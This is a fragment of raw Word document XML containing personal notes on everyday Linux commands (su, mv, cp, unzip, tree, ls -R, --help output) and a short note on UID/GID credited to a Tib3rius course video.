      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033BC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to switch users:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033BD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1467"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">su [username]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033BE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1467"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Requires you to know their password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033BF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1467"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo su [username]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1467"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you need sudo privileges in order to switch</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033C1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033C2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033C3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to move folders/file:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033C4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1233"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mv /path/to/source_folder /path/to/destination</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033C5">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033C6">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to copy a folder:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033C7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="821"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cp -r /path/to/source_folder /path/to/destination/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033C8">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to copy a file:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033C9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="514"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cp /path/to/source_file /path/to/destination/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033CA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you want to unzip into another directory (since sometimes if the zipped file has a lot of content, then you want to have it all organized in a separate directory);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033CB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="619"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">unzip my_archive.zip -d /path/to/destination/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033CC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033CD">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_h4ry353zfkvl" w:id="458"/>
      <w:bookmarkEnd w:id="458"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Recursively looking through directory</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033CE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033CF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033D0">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tree</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033D1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">VERY concise, which I like</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To limit the amount of levels, do </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tree -L 3</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033D3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Look at </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tree --help</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> for more information</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033D4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033D5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ls -R</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033D6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1392"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In powershell, it's</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> ls -r</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033D7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033D8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033D9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_hu6rdlw7cvml" w:id="459"/>
      <w:bookmarkEnd w:id="459"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Help</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033DA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When you use --help, you might see something like this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033DB">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--kdb=s        Optional KeePass database file to open (must exist).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033DC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--timeout=i    Lock interface after i seconds of inactivity.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033DD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033DE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">=s</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> means it expects string argument and</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> =i </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">means it expects integer argument</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033DF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033E0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033E1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_901j719hndqe" w:id="460"/>
      <w:bookmarkEnd w:id="460"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">UID and GID</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033E2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033E3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3162300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="28" name="image33.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image33.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1124"/>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33E4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="333"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from Tib3rius course. Video is "Understanding Permissions in Linux "</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033E5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="333"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This explains the difference between Real, Effective, and Saved UID/GID</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033E6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="333"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Effective ID is the one mostly used</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033E7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033E8">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_oion7bld48iv" w:id="461"/>
      <w:bookmarkEnd w:id="461"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/home </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033E9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1447800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="514" name="image494.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image494.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1125"/>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33EA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1398"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is what a normal /home directory looks like</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033EB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033EC">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_pznzojfq9acs" w:id="462"/>
      <w:bookmarkEnd w:id="462"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Other things to know about Linux</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033ED">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033EE">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CTRL + R</w:t>
      </w:r>
    </w:p>
